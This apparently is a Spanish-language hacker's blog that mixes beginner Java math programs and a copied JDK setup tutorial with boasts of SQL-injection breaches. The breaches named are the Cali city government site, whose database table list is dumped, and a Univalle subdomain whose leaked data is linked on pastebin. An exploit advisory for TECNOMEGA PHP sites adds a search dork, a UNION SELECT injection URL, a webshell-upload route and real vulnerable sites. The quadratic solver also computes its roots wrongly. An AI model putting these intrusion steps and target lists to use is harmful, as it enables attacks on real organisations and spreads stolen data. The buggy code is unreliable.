Teorema de Pitagoras en JAVA [POO] c0d3 by R4z0R

/*

escriba un codigo en java que calcule catetos e hipotenusa por teorema de pitagoras

*/

import java.util.*;
public class pitagoras {
public Scanner lea = new Scanner (System.in);
public double a, b, c, x;

public static void main (String[]args) {
Scanner capture = new Scanner (System.in);
pitagoras objeto = new pitagoras();
objeto.banner();
System.out.println (” #### Teorema de Pitagoras ####”);
System.out.println (“¿Que Desea Hallar?”);
System.out.println (“1) Hipotenusa”);
System.out.println (“2) Cateto A”);
System.out.println (“3) Cateto B”);

int opc = capture.nextInt();

switch (opc) {
case 1:
objeto.hipotenusa();
break;
case 2:
objeto.catetoA();
break;
case 3:
objeto.catetoB();
break;
default: System.out.println (“Opcion No valida”);

}

} /* fin void main */

public void banner() {
System.out.println (“-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-“);
System.out.println (“-=- ## -=-“);
System.out.println (“-=- Teorema # # -=-“);
System.out.println (“-=- a # # b -=-“);
System.out.println (“-=- de # # -=-“);
System.out.println (“-=- ########## Pitagoras -=-“);
System.out.println (“-=- c -=-“);
System.out.println (“-=- ///////////////////////////////////// -=-“);
System.out.println (“-=- c0d3 by @r4z0r_bl4ck -=-“);
System.out.println (“-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-“);

}

public void hipotenusa() {
System.out.println (“Ingrese el cateto A”);
a = lea.nextDouble();
System.out.println (“Ingrese el cateto B”);
b = lea.nextDouble();
x = ((a*a)+(b*b));
c = Math.sqrt(x);
System.out.println (“La Hipotenusa del triangulo es: ” +c);
}

public void catetoA() {
System.out.println (“Ingrese el cateto B”);
b = lea.nextDouble();
System.out.println (“Ingrese La Hipotenusa”);
c = lea.nextDouble();
x = ((c*c)-(b*b));
a = Math.sqrt(x);
System.out.println (“El Cateto A del triangulo es: ” +a);
}
public void catetoB() {
System.out.println (“Ingrese el cateto A”);
a = lea.nextDouble();
System.out.println (“Ingrese La Hipotenusa”);
c = lea.nextDouble();
x = ((c*c)-(a*a));
b = Math.sqrt(x);
System.out.println (“El Cateto B del triangulo es: ” +b);
}

} /* fin class */

=================================================

c0d3r by @R4Z0R

Determinantes 2×2 y 3×3 en JAVA [POO] by R4z0R

=> Escriba un programa que calcule determinantes de una matriz 2×2 y 3×3, el usuario debe elegir el tamaño de la matriz

import java.util.Scanner;
public class determinantes {
public static void main (String [] args) {
determinantes obj = new determinantes();
obj.elegir();

}

public void elegir() {
Scanner lea = new Scanner (System.in);
int opc;
System.out.println (“Seleccione el Tamaño de la Matriz:”);
System.out.println (“1) Matrices 2×2”);
System.out.println (“2) Matrices 3×3”);
opc = lea.nextInt();
switch (opc) {
case 1:
int matriz[][]=new int[2][2];
System.out.println (“Ingrese los elementos de las siguientes intersecciones de la Matriz ‘A’ en su respectivo orden: (1,1 – 1,2 – 2,1 – 2,2)”);
for(int i=0;i<2;i++){
for(int j=0;j<2;j++){
matriz[i][j] = lea.nextInt();
}
}
System.out.println ("A = ");
for(int i=0;i<2;i++){
for(int j=0;j<2;j++){
System.out.print ("|"+ matriz[i][j] +"|");
}
System.out.println ();
}

for(int i=0;i<2;i++){
for(int j=0;j<2;j++){
int determinante;
determinante = (matriz[0][0] * matriz[1][1]) – (matriz[1][0] * matriz[0][1]);
System.out.println ("Determinante: " +determinante);
break;
}
break;
}

break;
case 2:

int matriz1[][]=new int[3][3];
System.out.println ("Ingrese los elementos de las siguientes intersecciones de la Matriz 'A' en su respectivo orden: (1,1 – 1,2 – 1,3 – 2,1 – 2,2 – 2,3 – 3,1 – 3,2 – 3,3)");
for(int i=0;i<3;i++){
for(int j=0;j<3;j++){
matriz1[i][j] = lea.nextInt();
}
}
System.out.println ("A = ");
for(int i=0;i<3;i++){
for(int j=0;j<3;j++){
System.out.print ("|"+ matriz1[i][j] +"|");
}
System.out.println ();
}

for(int i=0;i<3;i++){
for(int j=0;j<3;j++){

int determinante;
determinante = ((matriz1[0][0] * matriz1[1][1] * matriz1[2][2]) + (matriz1[0][1] * matriz1[1][2] * matriz1[2][1]) + (matriz1[1][0] * matriz1[2][1] * matriz1[0][2]) ) – ( (matriz1[2][0] * matriz1[1][1] * matriz1[0][2]) + (matriz1[1][0] * matriz1[0][1] * matriz1[2][2]) + (matriz1[2][1] * matriz1[1][2] * matriz1[0][0]) );
System.out.println ("Determinante: " +determinante);
break;
}
break;
}

break;
default: System.out.println ("La Opcion Ingresada no es valida, ingrese solo 1 ó 2");
}
}
}

====================================================

c0d3 by R4Z0R

www.cali.gov.co #HACKED by @r4z0r_bl4ck

Pues bien….. esta ves el turno fue para la alcaldia municipal de la ciudad de santiago de cali – colombia.

despues de explorar y mapear las secciones del portal me he encontrado con una combinacion de parametros que al colocar un caracter no valido, arroja un error de SQL

verimg:
cali.gov.co hacked

PUES BIEN, REVISANDO LOS ANTECEDENTES EN GOOGLE SALE QUE ESTE PORTAL YA HA SIDO PENETRADO POR SECTOR_404 DE COLOMBIA, REALIZANDO UNA PUBLICACION, PERO AUN NO SE REPORTA UN DEFACE COMO TAL AL INDEX PRINCIPAL NI MUCHO MENOS UN REGISTRO EN ZONE-H, SIN SABER SI HAN ENTRADO POR LA MISMA VULNERABILIDAD QUE MUESTRO EN SU DB.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-# DB NAME #-
caligovco

-# TABLAS #-

tn_album_cat
tn_album_img
tn_banners
tn_banners_camp
tn_banners_stats
tn_banners_xcom
tn_bloque
tn_calen_categ
tn_calen_evento
tn_calendario_eventos
tn_citas_calis
tn_citas_citas
tn_citas_config
tn_citas_intentos
tn_coment_pub
tn_contac_config
tn_contac_lst
tn_contac_msg
tn_dias_festivos
tn_dir_categoria
tn_dir_cattelefonico
tn_dir_permisos
tn_dir_permisosAdmin
tn_dir_telefonico
tn_docs_docs
tn_enc_info
tn_enc_preguntas
tn_faq_categorias
tn_faq_permisos
tn_faq_respuestas
tn_foros_categorias
tn_foros_comentarios
tn_foros_permisos
tn_frm_fields
tn_frm_fieldset
tn_frm_form
tn_frm_perms
tn_frm_values
tn_frm_vot
tn_frm_votCampo1
tn_frm_votCampo2
tn_gal_perms
tn_galeria_categorias
tn_galeria_files
tn_glosario_terminos
tn_grupos_bloques
tn_grupos_comu
tn_grupos_gmember
tn_grupos_lst
tn_grupos_permsMod
tn_module_vars
tn_modulos
tn_not_config
tn_not_conte
tn_not_index
tn_pub_archh
tn_pub_archm
tn_pub_archn
tn_pub_grp
tn_pub_metas
tn_pub_obseh
tn_pub_obsem
tn_pub_obsen
tn_pub_perms
tn_pub_permsFile
tn_pub_procs
tn_pub_publh
tn_pub_publm
tn_pub_publn
tn_pub_stats
tn_pub_temas
tn_pub_tuser
tn_pub_user
tn_pub_usrg
tn_punt_rango
tn_punt_valoracion
tn_realm1
tn_realm4
tn_reg_campo1
tn_reg_campo2
tn_reg_config
tn_reg_usuarios
tn_session_info
tn_sil_catUbis
tn_sil_categorias
tn_sil_comunas
tn_sil_ubis
tn_sil_ubisObservaciones
tn_stats_comu
tn_stats_contar
tn_stats_fecha
tn_stats_hocom
tn_stats_hora
tn_stats_mes
tn_stats_refer
tn_stats_semana
tn_sv_asuntos
tn_sv_comentarios
tn_sv_config
tn_sv_mensajes
tn_sv_organigrama
tn_sv_plogvencidas
tn_sv_user
tn_sx_ayudas
tn_sx_cliente
tn_sx_cliente_comu
tn_sx_cliente_mod
tn_sx_configEditor
tn_sx_distribuidor
tn_sx_fieldSet
tn_sx_files
tn_sx_modulos
tn_sx_session
tn_sx_sessionCheck
tn_sx_sessionLog
tn_sx_vars
tn_tramites_comentarios
tn_tramites_dependencias
tn_tramites_gruposInt
tn_tramites_info
tn_tramites_permisos
tn_tramites_subtemas
tn_tramites_subtemasRel
tn_tramites_temas
tn_tramites_tramGrpInt
tn_tramites_tramites
tn_tramites_visitas
tn_user_bloquePerms
tn_user_comunPerms
tn_user_gmember
tn_user_gperms
tn_user_groups
tn_user_lst
tn_user_permsMod
tn_user_temas
tn_user_temaspref
tn_usr_frg
tn_valorizacion_ciudades
tn_valorizacion_departamentos
tn_valorizacion_descarga_pazysalvos
tn_valorizacion_factura_linea
tn_valorizacion_logs
tn_valorizacion_notarios
tn_valorizacion_pazysalvo
tn_valorizacion_pazysalvo_old
vtm_content
vtm_fce
vtm_page
vtm_page_header
vtm_setup
vtm_template
vtm_template_header
vtm_url_base
vtm_vendor_header

-# END # –

by @r4z0r_bl4ck

PWN3D a administracion.univalle.edu.co by @r4z0r_bl4ck

Bueno pues esta ves navegando por la inmensa internet me tropiezo con una vulnerabilidad de SQL Injection en un subdominio de la pagina web de la Universidad del Valle – Cali (UNIVALLE), pues bien me di a la tarea de sacar un muestreo de datos de dicho dominio para retificar que el error arrojado fuera valido y que permitiera la extraccion de datos por medio de herramientas o tools para un dataleaks que fue lo que hize y publique en un pastebin.

Imagen del FDP de la vulnerabilidad de SQL

sqlenunivalle

pues bien, no es nada nuevo que esta institucion de educacion superior sufra ataques ciberneticos pues me di a la tarea de investigar un poco en google y me di cuenta que dos dominios mas han sido ‘hackeados’ entre ellos el principal y otro subdominio, dichos ataques de defacement han sido registrados en el zone-h, con este dominio mas vulnerable que he encontrado y que no esta registrado en el zone-h pero que apenas cuenta con un mini-dataleaks publicado por mi esta libre de uso y dispocicion de aquel que quiera usarlo.

hackeanunivalle

aca esta el link del pastebin: http://pastebin.com/uYUUNutE

by @r4z0r_bl4ck

Esto No Es Guerra, Pero Se Pelea!
VIVA ¡¡UNILLANOS!!

[Tutorial] Instalar Java (JDK) en Windows 7

Antes de empezar necesitamos descargar el Java Development Kit o mejor conocido como el Java JDK desde la página de Java o mejor dicho de la página de Sun.
Descargar JDK – Java Development Kit
Una vez descargado dicho archivo, le damos doble clic para que empiece la instalación del mismo. Y nos aparecerá una pantalla como esta:

JDK-Windows-7-1

“Leemos” el contrato de Usuario Final, y le damos Clic en Accept >

JDK-Windows-7-2

Si queremos cambiar la capeta de instalación le podemos dar clic en Change… e instalarla donde quiera, Yo la dejé en la ruta por default. Y después le damos Next.

JDK-Windows-7-3

Empezará la instalación del Java JDK y tendremos que esperar unos minutos, dependiendo del rendimiento de tu equipo de computo.

JDK-Windows-7-4

Al terminar la instalación del Java JDK, nos pedirá la carpeta de destino donde se tiene que instalar el JRE de Java, este es importante instalarlo, para que se ejecuten los programas hecho en Java. Yo dejé la ruta por default. Damos Clic en Next >.

JDK-Windows-7-5

Empezará la instalación de Java JRE y dependerá del funcionamiento de nuestro equipo, cuanto dure esta instalación, por lo general dura unos pocos minutos.

JDK-Windows-7-6

Una vez que haya terminado la instalación del Java JRE, le daremos clic en Finish y terminará la instalación de Java JDK y Java JRE.
Todavía aquí no termina esto, si no que hay que configurar las variables de entorno para que podamos “compilar” desde la Consola de Comandos de Windows 7.
Damos Clic Derecho a Mi PC y nos vamos a Propiedades. Y nos aparecerá una ventana donde aparece la información de nuestro sistema, Damos clic en Configuración Avanzada del Sistema, que se encuentra a la izquierda. Y nos debe de aparecer una ventana como esta:

JDK-Windows-7-7

Nos vamos a la pestaña de Opciones Avanzadas y damos clic en Variables de Entorno

JDK-Windows-7-8

Buscamos en las Variables del sistema, la variable llamada Path y le damos clic en Editar

JDK-Windows-7-9

Se abrirá una nueva ventana y le agregamos esto: ;C:\Program Files\VERSION DE TU JAVA\bin si es que dejamos la ruta por default del instalador, si lo metiste en otra carpeta, deberás poner la dirección donde se encuentra instalado el JDK. Y damos Clic en Aceptar.

JDK-Windows-7-10

Después ahi mismo en Variables del Sistema, crearemos una nueva variable llamada Classpath y tendrá la dirección de nuestro src.zip en este caso sería esta: ;C:\Program Files\Java\VERSION DE TU JAVA\src.zip y le damos clic en Aceptar.
Le damos Clic en Aceptar en Variables de Entorno y en la Ventana de Opciones Avanzadas.
Ahora nos iremos a la Consola de Comandos de Windows 7, o al famoso CMD, una vez abierto escribimos javac y deberá mostrar este contenido.

JDK-Windows-7-11

Y si se muestra esto, quedó instalado el Java JDK en nuestro sistema de Windows 7, y podemos crear los programas y compilarlos desde la consola de comandos. O lo que es mejor, instalar un IDE como Netbeans o JCreator. En lo personal uso el Netbeans.

tutorial not make by me!

Solucion de Ecuaciones Cuadraticas de 2do Grado [c0d3 JAVA]

ecuacioncuadratica

/*
Codigo para la solucion de ecuaciones cuadraticas
Write by @r4z0r_bl4ck
*/

import java.util.Scanner;
public class ecuacion_cuadratica {
Scanner lea = new Scanner (System.in);
public static void main (String[]args) {
ecuacion_cuadratica object = new ecuacion_cuadratica();
object.banner();
object.solucion();
}

public void banner() {
System.out.println (“#########################################################”);
System.out.println (“# SOLUCION ECUACIONES CUADRATICAS DE LA FORMA AX^2+BX+C #”);
System.out.println (“# —————————————————– #”);
System.out.println (“# Compiler: javac ecuacion_cuadratica.java #”);
System.out.println (“# modo uso: java ecuacion_cuadratica #”);
System.out.println (“# =-=-=-=-=-=-=-=- Coded by @r4z0r_bl4ck -=-=-=-=-=-=-= #”);
System.out.println (“#########################################################”);
}

public void solucion() {
double a,b,c,discriminante,x1,x2;
System.out.println (“Ingrese El Coeficiente de A”);
a = lea.nextDouble();
System.out.println (“Ingrese El Coeficiente de B”);
b = lea.nextDouble();
System.out.println (“Ingrese El Coeficiente de C”);
c = lea.nextDouble();
discriminante = ((b*b)-(4*(a*c)));

if (discriminante < 0) {
System.out.println ("La Ecuacion No Tiene Soluciones Reales");
}

if (discriminante == 0) {
System.out.println (“La ecuacion tiene solo una raiz real”);
x1 = (-b)/(2*a);
System.out.println (“La Solucion es, X1=X2 : ” +x1);
}

if (discriminante > 0) {
System.out.println ("La ecuacion tiene dos raizes reales");
x1 = (-b)+Math.sqrt(discriminante)/(2*a);
x2 = (-b)-Math.sqrt(discriminante)/(2*a);
System.out.println ("La Solucion es, X1 = " +x1+ " y, X2 = " +x2);
}

}
}

______________________________________________________________________

# Guardar como ecuacion_cuadratica.java
# Pastebin: http://pastebin.com/1A4APN1u
# No robar codigos, mas bien distribuir el codigo 😉
______________________________________________________________________

TECNOMEGA / SQL Injection vulnerability & Shell Upload

# Exploit Title: TECNOMEGA / SQL Injection vulnerability & Shell Upload
# Date: 21/02/2013
# Exploit Author: Diego_Asencio || r4z0r_bl4ck
# Twitter: @r4z0r_bl4ck
# Blog: https://r4z0rbl4ck.wordpress.com/
# Vendor Homepage: http://www.tecnomega.net/
# Tested on: Linux Ubuntu
# Categoria: WebApps – PHP
# Google Dork: inurl:.php?id= intext:Desarrollado por TECNOMEGA || inurl:registrarme.php intext:Desarrolado por TECNOMEGA
# WorkGroup: @inside0utside

-= INFORMACION =-

La Empresa Digital TECNOMEGA desarrolla aplicaciones web en lenguaje PHP, en el cual no tienen en cuenta el filtrado de variables, ni el filtrado de extenciones de archivos en los ‘uploads’ o subidores de archivos, permitiendo a un atacante subir su phpshell por medio de un formulario de registro de usuario normal, o realizando la inyeccion de SQL para obtener los datos del usuario administrador

-= MYSQL ERROR =-

Error
SELECT * FROM productos WHERE marca=’1” AND estado=’1′ ORDER BY nombre ASC limit 0,16
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1’ ORDER BY nombre ASC limit 0,16′ at line 1

-= XPL (PoC) =-

1) => http://127.0.0.1/*.php?id=1+union+all+select+0,1,2,3,4&#8211; [SQL Injection]

2) => http://127.0.0.1/registrarme.php [Shell Upload]

-= DEMO’s =-

http://itouch.com.co/detalle-accesorio.php?id=362 (SQLi)
http://www.revistacolombianadesaludocupacional.co/autor-detalle.php?id=49 (SQLi)
http://tecnomega.net/productos-marcas.php?id=15 (SQLi)
http://www.unilibrecali.edu.co/Revista_Colombiana_Salud_Ocupacional/autor-detalle.php?id=42 (SQLi)
http://dkrinmobiliaria.com/detalle_inmueble.php?id=36 (SQLi)
http://megatec.com.co/noticias.php?id=9 (SQLi)
http://www.computiendaelectronica.com/detalle_producto.php?id=189 (SQLi)

=> Asi Mismo, para subir shell el dominio seria el mismo, pero con el directorio /registrarme.php donde en el campo para subir la foto de perfil, se colara la WebShell en el servidor por no filtrar extenciones en los formularios de uploads

#################################
Agradecimientos a:

@inside0utside – t34m /
– all members

@R4z0r_Bl4ck
@Sr_Xaoc
@MaximusWell
@MikeSoft
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-